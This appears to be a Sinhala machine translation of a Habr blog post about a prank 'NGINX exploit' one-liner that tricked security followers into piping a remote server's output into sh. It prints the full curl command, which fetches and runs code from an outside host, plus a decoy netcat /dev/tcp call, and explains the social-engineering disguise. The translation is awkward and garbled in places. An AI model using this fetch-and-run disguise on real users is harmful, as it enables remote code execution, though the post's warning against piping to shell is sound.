සටහන. පරිවර්තනය.:
TL;DR: කිසිම තත්වයක් යටතේ sh හෝ bash හි ගොනු නල මාර්ග භාවිතා නොකරන්න. ඔබේ පරිගණකයේ පාලනය නැති කර ගැනීමට මෙය හොඳ ක්රමයකි.
මැයි 31 වන දින නිර්මාණය කරන ලද විකට PoC සූරාකෑමක් පිළිබඳ කෙටි කතාවක් ඔබ සමඟ බෙදා ගැනීමට මට අවශ්යය. වෙතින් ලැබෙන ප්රවෘත්ති වලට ප්රතිචාර වශයෙන් ඔහු වහාම පෙනී සිටියේය
curl හි නව අපැහැදිලි තාක්ෂණයක් මත වැඩ අවසන් කිරීමෙන් පසු, මම මුල් ට්වීට් එක උපුටා දක්වමින් සොයාගත් අවදානම ගසාකන බව කියන තනි කේත පේළියකින් සමන්විත “ක්රියාකාරී PoC කාන්දු කළා”. ඇත්ත වශයෙන්ම, මෙය සම්පූර්ණ විකාරයක් විය. මම උපකල්පනය කළේ මා වහාම නිරාවරණය වනු ඇති බවත්, හොඳම දෙය නම් මට නැවත ට්වීට් කිහිපයක් ලැබෙනු ඇති බවත්ය (අනේ හොඳයි).
කෙසේ වෙතත්, ඊළඟට සිදුවූයේ කුමක්දැයි මට සිතාගත නොහැකි විය. මගේ ට්වීට් ජනප්රියත්වය ඉහළ ගියා. පුදුමයට කරුණක් නම්, මේ මොහොතේ (15:00 මොස්කව් වේලාව ජුනි 1) මෙය ව්යාජ එකක් බව ස්වල්ප දෙනෙක් වටහාගෙන ඇත. බොහෝ අය එය කිසිසේත් පරීක්ෂා නොකර එය නැවත ට්වීට් කරයි (එය ප්රතිදානය කරන සුන්දර ASCII ග්රැෆික්ස් අගය කිරීම හැර).
එය කෙතරම් අලංකාරදැයි බලන්න!
මෙම සියලු ලූප සහ වර්ණ විශිෂ්ට වුවත්, ඒවා බැලීමට මිනිසුන්ට ඔවුන්ගේ යන්ත්රයේ කේතය ධාවනය කිරීමට සිදු වූ බව පැහැදිලිය. වාසනාවකට මෙන්, බ්රව්සර් එකම ආකාරයකින් ක්රියා කරයි, සහ මට නීතිමය ගැටලුවකට පැටලීමට අවශ්ය නොවීම සමඟ ඒකාබද්ධව, මගේ වෙබ් අඩවියේ තැන්පත් කර ඇති කේතය කිසිදු අමතර කේතයක් ස්ථාපනය කිරීමට හෝ ක්රියාත්මක කිරීමට උත්සාහ නොකර echo ඇමතුම් ලබා දෙමින් සිටියේය.
කුඩා අපගමනය:
curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost
සමාජ-ඉලෙක්ට්රොනික ඉංජිනේරු විද්යාව (SEE) - තතුබෑම් වලට වඩා වැඩි යමක්
මෙම අත්හදා බැලීමේ ප්රධාන අංගයක් වූයේ ආරක්ෂාව සහ හුරුපුරුදුකමයි. මම හිතන්නේ ඒවා තමයි ඔහුගේ සාර්ථකත්වයට හේතු වුණේ. "127.0.0.1" (සුප්රසිද්ධ දේශීය සත්කාරක) වෙත යොමු කිරීම මගින් විධාන රේඛාව පැහැදිලිවම ආරක්ෂාව ඇඟවුම් කරයි. Localhost ආරක්ෂිත ලෙස සලකනු ලබන අතර එහි ඇති දත්ත කිසිවිටෙක ඔබේ පරිගණකයෙන් ඉවත් නොවේ.
හුරුපුරුදුකම අත්හදා බැලීමේ දෙවන ප්රධාන SEE සංරචකය විය. ඉලක්කගත ප්රේක්ෂකයින් මූලික වශයෙන් පරිගණක ආරක්ෂාව පිළිබඳ මූලික කරුණු හුරුපුරුදු පුද්ගලයින්ගෙන් සමන්විත වූ බැවින්, එහි කොටස් හුරුපුරුදු සහ හුරුපුරුදු (සහ එබැවින් ආරක්ෂිත) ලෙස පෙනෙන පරිදි කේතයක් නිර්මාණය කිරීම වැදගත් විය. පැරණි සූරාකෑමේ සංකල්පවල මූලද්රව්ය ණයට ගැනීම සහ අසාමාන්ය ආකාරයෙන් ඒවා ඒකාබද්ධ කිරීම ඉතා සාර්ථක බව ඔප්පු වී ඇත.
පහත දැක්වෙන්නේ එක්-ලයිනර් පිළිබඳ සවිස්තරාත්මක විශ්ලේෂණයකි. මෙම ලැයිස්තුවේ ඇති සෑම දෙයක්ම පැළඳ සිටී රූපලාවන ස්වභාවය, සහ එහි සැබෑ ක්රියාකාරිත්වය සඳහා ප්රායෝගිකව කිසිවක් අවශ්ය නොවේ.
ඇත්ත වශයෙන්ම අවශ්ය සංරචක මොනවාද? මෙය -gsS
, -O 0x0238f06a
, |sh
සහ වෙබ් සේවාදායකයම. වෙබ් සේවාදායකයේ කිසිදු අනිෂ්ට උපදෙස් අඩංගු නොවීය, නමුත් විධාන භාවිතයෙන් ASCII ග්රැෆික්ස් සරලව සේවය කළේය echo
හි අඩංගු පිටපතෙහි index.html
. පරිශීලකයා සමඟ රේඛාවක් ඇතුළත් කළ විට |sh
අතරමැද දී, index.html
පටවා ක්රියාත්මක කර ඇත. වාසනාවකට මෙන්, වෙබ් සේවාදායකයේ භාරකරුවන්ට නරක චේතනාවක් නොතිබුණි.
-
../../../%00
- නාමාවලියෙන් ඔබ්බට යාම නියෝජනය කරයි; -
ngx_stream_module.so
- අහඹු NGINX මොඩියුලයකට මාර්ගය; -
/bin/sh%00<'protocol:TCP'
- අපි දියත් කරනවා යැයි කියනු ලැබේ/bin/sh
ඉලක්ක යන්ත්රය මත සහ ප්රතිදානය TCP නාලිකාව වෙත හරවා යැවීම; -
-O 0x0238f06a#PLToffset
- රහස් අමුද්රව්ය, පරිපූරක#PLToffset
, PLT හි කෙසේ හෝ අඩංගු මතක ඕෆ්සෙට් එකක් ලෙස පෙනෙන්නට; -
|sh;
- තවත් වැදගත් කොටසක්. හි පිහිටා ඇති ප්රහාරක වෙබ් සේවාදායකයෙන් එන කේතය ක්රියාත්මක කිරීම සඳහා අපට ප්රතිදානය sh/bash වෙත හරවා යැවීමට අවශ්ය විය.0x0238f06a
(2.56.240.x
); -
nc /dev/tcp/localhost
- නෙට්කැට් සඳහන් කරන ව්යාජ එකක්/dev/tcp/localhost
එවිට සෑම දෙයක්ම නැවත ආරක්ෂිතව පෙනේ. ඇත්ත වශයෙන්ම, එය කිසිවක් නොකරන අතර අලංකාරය සඳහා පේළියට ඇතුළත් වේ.
මෙය එක් පේළියේ පිටපත විකේතනය කිරීම සහ "සමාජ-ඉලෙක්ට්රොනික ඉංජිනේරු" (සංකීර්ණ තතුබෑම්) යන අංශ පිළිබඳ සාකච්ඡාව අවසන් කරයි.
වෙබ් සේවාදායක වින්යාසය සහ ප්රතිවිරෝධතා
මගේ ග්රාහකයින්ගෙන් අතිමහත් බහුතරය infosec/hackers වන බැවින්, ඔවුන්ගේ පැත්තෙන් “උනන්දුව” ප්රකාශ කිරීමට වෙබ් සේවාදායකය මඳක් ප්රතිරෝධී කිරීමට මම තීරණය කළෙමි, එවිට පිරිමින්ට යමක් කිරීමට සිදුවනු ඇත (එය විනෝදජනක වනු ඇත. සැලසුම). අත්හදා බැලීම තවමත් සිදුවෙමින් පවතින බැවින් මම මෙහි සියලු අන්තරායන් ලැයිස්තුගත කිරීමට යන්නේ නැත, නමුත් සේවාදායකය විසින් කරන දේවල් කිහිපයක් මෙන්න:
- ඇතැම් සමාජ ජාල වල බෙදාහැරීමේ උත්සාහයන් ක්රියාකාරීව අධීක්ෂණය කරන අතර සබැඳිය ක්ලික් කිරීමට පරිශීලකයා දිරිමත් කිරීමට විවිධ පෙරදසුන් සිඟිති රූ ආදේශ කරයි.
- Shell පිටපත පෙන්වීම වෙනුවට Thugcrowd ප්රවර්ධන වීඩියෝව වෙත Chrome/Mozilla/Safari/etc යළි-යොමු කරයි.
- අනවසරයෙන් ඇතුළුවීම / අමූලික අනවසරයෙන් ඇතුළුවීමේ පැහැදිලි සලකුණු සඳහා ඔරලෝසු, පසුව NSA සේවාදායකයන් වෙත ඉල්ලීම් යළි හරවා යැවීම ආරම්භ කරයි (ha!).
- සාමාන්ය බ්රවුසරයකින් ධාරකයට පිවිසෙන සියලුම පරිගණකවල ට්රෝජන්, මෙන්ම BIOS රූට්කිට් ස්ථාපනය කරයි (විහිළුවකට!).
ඇන්ටිමර් වල කුඩා කොටසක්
මෙම අවස්ථාවේ දී, මගේ එකම ඉලක්කය වූයේ Apache හි සමහර විශේෂාංග ප්රගුණ කිරීම - විශේෂයෙන්, ඉල්ලීම් යළි හරවා යැවීම සඳහා වන සිසිල් නීති - සහ මම සිතුවෙමි: ඇයි නැත්තේ?
NGINX Exploit (සැබෑ!)
වෙත දායක වන්න
මූලාශ්රය: www.habr.com